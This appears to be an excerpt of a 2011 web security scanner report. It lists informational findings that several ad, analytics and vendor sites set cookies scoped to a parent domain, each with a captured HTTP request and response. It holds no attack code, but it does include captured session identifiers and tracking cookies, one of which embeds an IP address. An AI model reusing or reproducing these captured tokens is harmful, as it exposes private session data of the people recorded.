   <TITLE>Shop a
...[SNIP]...

10.19. http://apr.lijit.com///www/delivery/ajs.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://apr.lijit.com
Path:   ///www/delivery/ajs.php

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET ///www/delivery/ajs.php?zoneid=128348&username=w3schools&numAds=1&premium=1&eleid=lijit_region_128348&abf=true&tid=128348_1315189911632f25086dd2955&lijit_kw=&cb=6227196357&flv=10.3.183&time=21:31:51&ifr=1&loc=http%3A//www.w3schools.com/jsref/tryit.asp%3Ffilename%3Dtryjsref_doc_writeln&referer=http%3A//www.w3schools.com/jsref/tryit.asp%3Ffilename%3Dtryjsref_doc_writeln HTTP/1.1
Host: apr.lijit.com
Proxy-Connection: keep-alive
Referer: http://www.w3schools.com/tryitbanner.asp?secid=tryjs&rnd=0.9388239
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ljtrtb=eJyrVjJSslIyMbY0NTJxdLVwNnMyMzZxNTAydDN1M7cA0mZmBkYGSrUAtFMI1w%3D%3D; OABLOCK=785.1315189866; OACAP=785.3; OASCAP=785.3; ljt_csync=rtb_turn%2Crtb_simplifi%2Crtb_mmath%2C1; _OACAP[785]=1; _OASCAP[785]=1; _OABLOCK[785]=1315189871; ljt_reader=9a524261efe1e1588396f48f16471b3c

Response

HTTP/1.1 200 OK
Date: Mon, 05 Sep 2011 02:31:20 GMT
Server: PWS/1.7.3.3
X-Px: ms lax-agg-n20 ( lax-agg-n44), ms lax-agg-n44 ( origin>CONN)
P3P: CP="CUR ADM OUR NOR STA NID"
Cache-Control: no-cache, no-store, must-revalidate, max-age=0
Pragma: no-cache
Expires: Fri, 20 Mar 2009 21:49:56 GMT
Content-Length: 12257
Content-Type: application/x-javascript; charset=UTF-8
Vary: Accept-Encoding
Connection: keep-alive
Set-Cookie: _OABLOCK[785]=deleted; expires=Sun, 05-Sep-2010 02:31:19 GMT; path=/; domain=.lijit.com
Set-Cookie: %5FOABLOCK%5B785%5D=deleted; expires=Sun, 05-Sep-2010 02:31:19 GMT; path=/; domain=.lijit.com
Set-Cookie: _OABLOCK[354]=deleted; expires=Sun, 05-Sep-2010 02:31:19 GMT; path=/; domain=.lijit.com
Set-Cookie: %5FOABLOCK%5B354%5D=deleted; expires=Sun, 05-Sep-2010 02:31:19 GMT; path=/; domain=.lijit.com
Set-Cookie: _OABLOCK[785354]=deleted; expires=Sun, 05-Sep-2010 02:31:19 GMT; path=/; domain=.lijit.com
Set-Cookie: %5FOABLOCK%5B785354%5D=deleted; expires=Sun, 05-Sep-2010 02:31:19 GMT; path=/; domain=.lijit.com
Set-Cookie: _OABLOCK[63]=deleted; expires=Sun, 05-Sep-2010 02:31:19 GMT; path=/; domain=.lijit.com
Set-Cookie: %5FOABLOCK%5B63%5D=deleted; expires=Sun, 05-Sep-2010 02:31:19 GMT; path=/; domain=.lijit.com
Set-Cookie: _OABLOCK[78563]=deleted; expires=Sun, 05-Sep-2010 02:31:19 GMT; path=/; domain=.lijit.com
Set-Cookie: %5FOABLOCK%5B78563%5D=deleted; expires=Sun, 05-Sep-2010 02:31:19 GMT; path=/; domain=.lijit.com
Set-Cookie: _OACAP[785]=deleted; expires=Sun, 05-Sep-2010 02:31:19 GMT; path=/; domain=.lijit.com
Set-Cookie: %5FOACAP%5B785%5D=deleted; expires=Sun, 05-Sep-2010 02:31:19 GMT; path=/; domain=.lijit.com
Set-Cookie: _OACAP[354]=deleted; expires=Sun, 05-Sep-2010 02:31:19 GMT; path=/; domain=.lijit.com
Set-Cookie: %5FOACAP%5B354%5D=deleted; expires=Sun, 05-Sep-2010 02:31:19 GMT; path=/; domain=.lijit.com
Set-Cookie: _OACAP[785354]=deleted; expires=Sun, 05-Sep-2010 02:31:19 GMT; path=/; domain=.lijit.com
Set-Cookie: %5FOACAP%5B785354%5D=deleted; expires=Sun, 05-Sep-2010 02:31:19 GMT; path=/; domain=.lijit.com
Set-Cookie: _OACAP[63]=deleted; expires=Sun, 05-Sep-2010 02:31:19 GMT; path=/; domain=.lijit.com
Set-Cookie: %5FOACAP%5B63%5D=deleted; expires=Sun, 05-Sep-2010 02:31:19 GMT; path=/; domain=.lijit.com
Set-Cookie: _OACAP[78563]=deleted; expires=Sun, 05-Sep-2010 02:31:19 GMT; path=/; domain=.lijit.com
Set-Cookie: %5FOACAP%5B78563%5D=deleted; expires=Sun, 05-Sep-2010 02:31:19 GMT; path=/; domain=.lijit.com
Set-Cookie: _OASCAP[785]=deleted; expires=Sun, 05-Sep-2010 02:31:19 GMT; path=/; domain=.lijit.com
Set-Cookie: %5FOASCAP%5B785%5D=deleted; expires=Sun, 05-Sep-2010 02:31:19 GMT; path=/; domain=.lijit.com
Set-Cookie: _OASCAP[354]=deleted; expires=Sun, 05-Sep-2010 02:31:19 GMT; path=/; domain=.lijit.com
Set-Cookie: %5FOASCAP%5B354%5D=deleted; expires=Sun, 05-Sep-2010 02:31:19 GMT; path=/; domain=.lijit.com
Set-Cookie: _OASCAP[785354]=deleted; expires=Sun, 05-Sep-2010 02:31:19 GMT; path=/; domain=.lijit.com
Set-Cookie: %5FOASCAP%5B785354%5D=deleted; expires=Sun, 05-Sep-2010 02:31:19 GMT; path=/; domain=.lijit.com
Set-Cookie: _OASCAP[63]=deleted; expires=Sun, 05-Sep-2010 02:31:19 GMT; path=/; domain=.lijit.com
Set-Cookie: %5FOASCAP%5B63%5D=deleted; expires=Sun, 05-Sep-2010 02:31:19 GMT; path=/; domain=.lijit.com
Set-Cookie: _OASCAP[78563]=deleted; expires=Sun, 05-Sep-2010 02:31:19 GMT; path=/; domain=.lijit.com
Set-Cookie: %5FOASCAP%5B78563%5D=deleted; expires=Sun, 05-Sep-2010 02:31:19 GMT; path=/; domain=.lijit.com
Set-Cookie: ljt_reader=a77f7cc039e4141166222dd; expires=Tue, 04-Sep-2012 02:31:20 GMT; path=/; domain=.lijit.com
Set-Cookie: OABLOCK=785.deleted_354.deleted_785354.deleted_63.deleted_78563.deleted; expires=Wed, 05-Oct-2011 02:31:20 GMT; path=/; domain=.lijit.com
Set-Cookie: OACAP=785.1_354.0_785354.0_63.deleted_78563.deleted; expires=Tue, 04-Sep-2012 02:31:20 GMT; path=/; domain=.lijit.com
Set-Cookie: OASCAP=785.1_354.0_785354.0_63.deleted_78563.deleted; path=/; domain=.lijit.com

var MAX_0516a14c = '';
MAX_0516a14c += "%3Cscript%20language%3D%22JavaScript%22%3Eif%20(typeof%20LJT_bC%20%3D%3D%20%22undefined%22)%20%7B%20LJT_bC%20%3D%20new%20Array()%3B%20%20%7D%20LJT_bC%5B128348%5
...[SNIP]...

10.20. http://b.scorecardresearch.com/b  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /b

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b?c1=8&c2=2101&c3=1234567891234567891&ns__t=1315189890173&ns_c=UTF-8&c8=&c7=http%3A%2F%2Fgoogleads.g.doubleclick.net%2Fpagead%2Fads%3Fclient%3Dca-pub-3440800076797949%26output%3Dhtml%26h%3D90%26slotname%3D5330033957%26w%3D728%26ea%3D0%26flash%3D10.3.183%26url%3Dhttp%253A%252F%252Fwww.w3schools.com%252Fjs%252Ftryit.asp%253Ffilename%253Dtryjs_text%26dt%3D1315189888080%26bpp%3D10%26shv%3Dr20110824%26jsv%3Dr20110719%26correlator%3D1315189888119%26frm%3D7%26adk%3D716720423%26ga_vid%3D1478965365.1315189423%26ga_sid%3D1315189423%26ga_hid%3D817954302%26ga_fc%3D1%26u_tz%3D-300%26u_his%3D1%26u_java%3D1%26u_h%3D1200%26u_w%3D1920%26u_ah%3D1156%26u_aw%3D1920%26u_cd%3D16%26u_nplug%3D20%26u_nmime%3D100%26dff%3Dverdana%26dfs%3D12%26biw%3D1266%26bih%3D910%26ifk%3D790186330%26fu%3D4%26ifi%3D3%26dtd%3D51&c9= HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-3440800076797949&output=html&h=90&slotname=5330033957&w=728&ea=0&flash=10.3.183&url=http%3A%2F%2Fwww.w3schools.com%2Fjs%2Ftryit.asp%3Ffilename%3Dtryjs_text&dt=1315189888080&bpp=10&shv=r20110824&jsv=r20110719&correlator=1315189888119&frm=7&adk=716720423&ga_vid=1478965365.1315189423&ga_sid=1315189423&ga_hid=817954302&ga_fc=1&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=20&u_nmime=100&dff=verdana&dfs=12&biw=1266&bih=910&ifk=790186330&fu=4&ifi=3&dtd=51
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=9951d9b8-80.67.74.150-1314793633

Response

HTTP/1.1 204 No Content
Content-Length: 0
Date: Mon, 05 Sep 2011 02:30:53 GMT
Connection: close
Set-Cookie: UID=9951d9b8-80.67.74.150-1314793633; expires=Wed, 04-Sep-2013 02:30:53 GMT; path=/; domain=.scorecardresearch.com
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID OUR IND COM STA OTC"
Pragma: no-cache
Expires: Mon, 01 Jan 1990 00:00:00 GMT
Cache-Control: private, no-cache, no-cache=Set-Cookie, no-store, proxy-revalidate
Server: CS


10.21. http://b.scorecardresearch.com/p  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /p

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /p?c1=8&c2=8500755&c3=3720565304d55bd8eb4bad&c15=&cv=2.0&cj=1 HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://www.wallstreetoasis.com/forums/houlihan-lokey-exit-opps
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=9951d9b8-80.67.74.150-1314793633

Response

HTTP/1.1 200 OK
Content-Length: 43
Content-Type: image/gif
Date: Sun, 04 Sep 2011 16:17:16 GMT
Connection: close
Set-Cookie: UID=9951d9b8-80.67.74.150-1314793633; expires=Tue, 03-Sep-2013 16:17:16 GMT; path=/; domain=.scorecardresearch.com
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID OUR IND COM STA OTC"
Pragma: no-cache
Expires: Mon, 01 Jan 1990 00:00:00 GMT
Cache-Control: private, no-cache, no-cache=Set-Cookie, no-store, proxy-revalidate
Server: CS

GIF89a.............!.......,...........D..;

10.22. http://b.scorecardresearch.com/r  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /r

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /r?c2=6035148&d.c=gif&d.o=djglobal&d.x=165506085&d.t=page&d.u=http%3A%2F%2Fonline.wsj.com%2Farticle%2FSB10001424053111904900904576549933849920392.html%3Fmod%3Dgooglenews_wsj&d.r=http%3A%2F%2Fwww.google.com%2Fsearch%3Fie%3DUTF-8%26q%3DHoulihan%2BLokey%26sourceid%3Dchrome HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://online.wsj.com/article/SB10001424053111904900904576549933849920392.html?mod=googlenews_wsj
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=9951d9b8-80.67.74.150-1314793633

Response

HTTP/1.1 200 OK
Content-Length: 43
Content-Type: image/gif
Date: Sun, 04 Sep 2011 16:17:42 GMT
Connection: close
Set-Cookie: UID=9951d9b8-80.67.74.150-1314793633; expires=Tue, 03-Sep-2013 16:17:42 GMT; path=/; domain=.scorecardresearch.com
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID OUR IND COM STA OTC"
Pragma: no-cache
Expires: Mon, 01 Jan 1990 00:00:00 GMT
Cache-Control: private, no-cache, no-cache=Set-Cookie, no-store, proxy-revalidate
Server: CS

GIF89a.............!.......,...........D..;

10.23. http://ce.lijit.com/merge  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ce.lijit.com
Path:   /merge

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /merge?pid=2&3pid=439524AE8C6B634E021F5F7802166020 HTTP/1.1
Host: ce.lijit.com
Proxy-Connection: keep-alive
Referer: http://www.lijit.com/beacon?viewId=13151898879098e79e1e7e81d&rand=1315189887909&uri=http://www.lijit.com/users/w3schools&informer=7846666&type=fpads&loc=http%3A%2F%2Fwww.w3schools.com%2Fjs%2Ftryit.asp%3Ffilename%3Dtryjs_text&rr=http%3A//www.w3schools.com/js/tryit.asp%3Ffilename%3Dtryjs_text&ifr=1&v=1.0&csync=1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ljtrtb=eJyrVjJUslIysjQytbQ0NrQwsjQ3NTE0MTc3VKoFAFC9Bds%3D; ljt_reader=9a524261efe1e1588396f48f16471b3c; ljt_csync=rtb_turn%2Crtb_simplifi%2Crtb_mmath%2C1

Response

HTTP/1.1 200 OK
Date: Mon, 05 Sep 2011 02:30:53 GMT
Server: PWS/1.7.3.3
X-Px: ms lax-agg-n55 ( lax-agg-n31), ms lax-agg-n31 ( origin>CONN)
P3P: CP="CUR ADM OUR NOR STA NID"
Cache-Control: private, max-age=0, no-cache, max-age=86400, must-revalidate
Pragma: no-cache
Expires: Tue, 06 Sep 2011 02:30:44 GMT
Content-Length: 43
Content-Type: image/gif
Connection: keep-alive
Set-Cookie: ljtrtb=eJyrVjJSslIyMbY0NTJxdLVwNnMyMzZxNTAydDN1M7cA0mZmBkYGSrUAtFMI1w%3D%3D; expires=Tue, 04-Sep-2012 02:30:44 GMT; path=/; domain=.lijit.com

GIF89a.............!.......,...........D..;

10.24. http://community.skype.com/t5/Android%27/Skype-for-Android-2-1-released-More-video-calling-on-more/td-p/59456  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://community.skype.com
Path:   /t5/Android%27/Skype-for-Android-2-1-released-More-video-calling-on-more/td-p/59456

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /t5/Android%27/Skype-for-Android-2-1-released-More-video-calling-on-more/td-p/59456 HTTP/1.1
Host: community.skype.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://burp/show/2
Cookie: mbox=session#1314116641836-449310#1314120755|PC#1314116641836-449310.19#1316710895|check#true#1314118955; s_nr=1314120062684-New; __utma=242698589.1857710967.1314116648.1314116648.1314116648.1; __utmz=242698589.1314116648.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName; s_vi=[CS]v1|2729EA07851D0931-6000010C20019DC8[CE]; SC=CC=:CCY=:ENV=cookieCheck:LC=en-us:LIM=:TM=1314116679:TS=1314116679:TZ=:UCP=:VAT=:VER=; LiSESSIONID=1F5F55A104B15E98305CB8453A5AA234; VISITORID=76516592

Response

HTTP/1.1 301 Moved Permanently
Date: Sun, 04 Sep 2011 22:42:56 GMT
Server: Apache/2.2.17 (Unix) mod_jk/1.2.31 mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5
Set-Cookie: LiSESSIONID=1F5F55A104B15E98305CB8453A5AA234; Path=/; HttpOnly
Set-Cookie: VISITORID=76516592; Domain=.skype.com; Expires=Thu, 04-Sep-2014 16:09:14 GMT; Path=/
Set-Cookie: LithiumUserInfo=""; Domain=.skype.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
location: /t5/Android/Skype-for-Android-2-1-released-More-video-calling-on-more/td-p/59456
Content-Length: 0
Connection: close
Content-Type: text/plain


10.25. http://community.skype.com/t5/English/ct-p/English  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://community.skype.com
Path:   /t5/English/ct-p/English

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /t5/English/ct-p/English?profile.language=en HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive
Cookie: skype-session-token=1881419e1eee3fb8450596c7441d08afecceb824; SC=CC=:CCY=:LC=en-us:LIM=:TM=1315170534:TS=1314118390:TZ=:VAT=:VER=0/5.5.0.115/0
Host: community.skype.com

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:09:48 GMT
Server: Apache/2.2.17 (Unix) mod_jk/1.2.31 mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5
Set-Cookie: VISITORID=1344388383; Domain=.skype.com; Expires=Thu, 04-Sep-2014 14:36:06 GMT; Path=/
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, private
Vary: Accept-Encoding
Content-Length: 174723
Connection: close
Content-Type: text/html;charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml">
   <head>
   
   
       <link class="lia-link
...[SNIP]...

10.26. http://community.skype.com/t5/image/serverpage/image-id/60iD23BC4754E7B32F3/image-dimensions/64x36  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://community.skype.com
Path:   /t5/image/serverpage/image-id/60iD23BC4754E7B32F3/image-dimensions/64x36

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /t5/image/serverpage/image-id/60iD23BC4754E7B32F3/image-dimensions/64x36?v=mpbl-1 HTTP/1.1
Accept: image/png, image/svg+xml, image/*;q=0.8, */*;q=0.5
Referer: http://community.skype.com/t5/English/ct-p/English?profile.language=en
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: community.skype.com
Proxy-Connection: Keep-Alive
Cookie: skype-session-token=1881419e1eee3fb8450596c7441d08afecceb824; SC=CC=:CCY=:LC=en-us:LIM=:TM=1315170534:TS=1314118390:TZ=:VAT=:VER=0/5.5.0.115/0; VISITORID=1344388383; LiSESSIONID=3607C6434AF107556B11C2CE05ECE91B

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:09:48 GMT
Server: Apache/2.2.17 (Unix) mod_jk/1.2.31 mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5
Set-Cookie: LiSESSIONID=3607C6434AF107556B11C2CE05ECE91B; Path=/; HttpOnly
Set-Cookie: VISITORID=1344388383; Domain=.skype.com; Expires=Thu, 04-Sep-2014 14:36:06 GMT; Path=/
Set-Cookie: LithiumUserInfo=""; Domain=.skype.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Content-Disposition: inline
Cache-Control: max-age=900
Last-Modified: Wed, 29 Jun 2011 09:10:42 GMT
Expires: Mon, 03 Sep 2012 21:09:48 GMT
Content-Length: 934
Connection: close
Content-Type: image/jpeg;charset=UTF-8

......JFIF.............C...........        .
................... $.' ",#..(7),01444.'9=82<.342...C.            .....2!.!22222222222222222222222222222222222222222222222222......$...."..............................
...[SNIP]...

10.27. http://content.dell.com/us/en/business/security-network.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://content.dell.com
Path:   /us/en/business/security-network.aspx

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /us/en/business/security-network.aspx?st=application%20security%20web&dgc=ST&cid=64824&lid=1652027&acd=s1CStlI5S,13885348293,901qz26673 HTTP/1.1
Host: content.dell.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?sourceid=chrome&ie=UTF-8&q=Houlihan+Lokey#sclient=psy&hl=en&source=hp&q=waf+web+application+security&pbx=1&oq=waf+web+application+security&aq=f&aqi=q-w1&aql=&gs_sm=e&gs_upl=21435l26606l1l26840l27l19l0l6l6l6l1160l12427l5-2.3.8l13l0&bav=on.2,or.r_gc.r_pw.&fp=b7e6040383bebbf&biw=1049&bih=910
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SITESERVER=ID=6aa205d057b942709557cad53be901a1; SITESERVER_SESSION=ID=6aa205d057b942709557cad53be901a1

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Expires: Wed, 01 Jan 1997 12:00:00 GMT
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-Awesomed-By: Thundera RE-TP.JR.NC
Set-Cookie: lwp=c=us&l=en&s=bsd&cs=04; domain=.dell.com; path=/
Set-Cookie: stop_mobi=; path=/
X-AspNet-Version: 4.0.30319
Set-Cookie: lwp=c=us&l=en&s=bsd&cs=04; domain=.dell.com; path=/
Set-Cookie: stop_mobi=; path=/
Set-Cookie: lwp=c=us&l=en&s=bsd&cs=04; domain=.dell.com; path=/
Set-Cookie: dus=ci=security-network&th=sb360; path=/
X-Powered-By: ASP.NET
X-UA-Compatible: IE=7
P3P: CP=" BUS CAO CNT COM CUR DEV DSP INT NAV OUR PSA PSD SAM STA TAI UNI "
Date: Sun, 04 Sep 2011 16:19:07 GMT
Content-Length: 53254


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" xm
...[SNIP]...

10.28. http://d.p-td.com/r/dm/mkt/4/mpid//mpuid/6981940571811189480/mchpid/2/url/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://d.p-td.com
Path:   /r/dm/mkt/4/mpid//mpuid/6981940571811189480/mchpid/2/url/

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /r/dm/mkt/4/mpid//mpuid/6981940571811189480/mchpid/2/url/ HTTP/1.1
Host: d.p-td.com
Proxy-Connection: keep-alive
Referer: http://www.lijit.com/beacon?viewId=13151898879098e79e1e7e81d&rand=1315189887909&uri=http://www.lijit.com/users/w3schools&informer=7846666&type=fpads&loc=http%3A%2F%2Fwww.w3schools.com%2Fjs%2Ftryit.asp%3Ffilename%3Dtryjs_text&rr=http%3A//www.w3schools.com/js/tryit.asp%3Ffilename%3Dtryjs_text&ifr=1&v=1.0&csync=1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid=4018048898892878422

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV"
Cache-Control: max-age=0, no-cache, no-store, private, must-revalidate, s-maxage=0
Pragma: no-cache
Set-Cookie: uid=4018048898892878422; Domain=.p-td.com; Expires=Sat, 03-Mar-2012 02:30:53 GMT; Path=/
Content-Type: image/gif
Content-Length: 43
Date: Mon, 05 Sep 2011 02:30:52 GMT

GIF89a.............!.......,...........D..;

10.29. http://dce.sapha.com/logging.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://dce.sapha.com
Path:   /logging.php

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /logging.php?ac=2522&NS_sw=1920&NS_sh=1200&NS_sc=16&NS_c=yes&NS_pn=&NS_vpn=&NS_uuid=&NS_pt=Bandwidth%20Shaping%20and%20Control%20Demo&NS_ru=http%3A//www.google.com/search%3Fsourceid%3Dchrome%26ie%3DUTF-8%26q%3DHoulihan+Lokey%23sclient%3Dpsy%26hl%3Den%26source%3Dhp%26q%3Dwaf+web+application+security%26pbx%3D1%26oq%3Dwaf+web+application+security%26aq%3Df%26aqi%3Dq-w1%26aql%3D%26gs_sm%3De%26gs_upl%3D21435l26606l1l26840l27l19l0l6l6l6l1160l12427l5-2.3.8l13l0%26bav%3Don.2%2Cor.r_gc.r_pw.%26fp%3Db7e6040383bebbf%26biw%3D1049%26bih%3D910&NS_rn=23696&NS_js=1.6&NS_vp=http%3A//www.cymphonix.com/2011-shaping-demo-sem.html%3Futm_campaign%3D2011-Q1-Web-AdWords%26utm_source%3DAdWords%26utm_content%3D7-Minute-Demo%26gclid%3DCPr6tJD_g6sCFQo0QgodKw5i0g&NS_tz=300&NS_la=&NS_tid=&NS_tamt=&NS_cid= HTTP/1.1
Host: dce.sapha.com
Proxy-Connection: keep-alive
Referer: http://www.cymphonix.com/2011-shaping-demo-sem.html?utm_campaign=2011-Q1-Web-AdWords&utm_source=AdWords&utm_content=7-Minute-Demo&gclid=CPr6tJD_g6sCFQo0QgodKw5i0g
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sapha_tst_2522=TRUE

Response

HTTP/1.1 302 Found
Date: Sun, 04 Sep 2011 16:19:28 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
P3P: CP='NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM'
Cache-Control: private
Set-Cookie: sapha_2522_1=1038377%7C214589%7C149788%7C2011-09-04+10%3A19%3A28; expires=Wed, 01-Sep-2021 16:19:28 GMT; path=/; domain=.sapha.com
Location: http://dce.sapha.com/0.gif
Vary: Accept-Encoding,User-Agent
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8


10.30. http://h30434.www3.hp.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://h30434.www3.hp.com
Path:   /

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: h30434.www3.hp.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 16:32:33 GMT
Server: Apache/2.2.17 (Unix) mod_jk/1.2.31 mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5
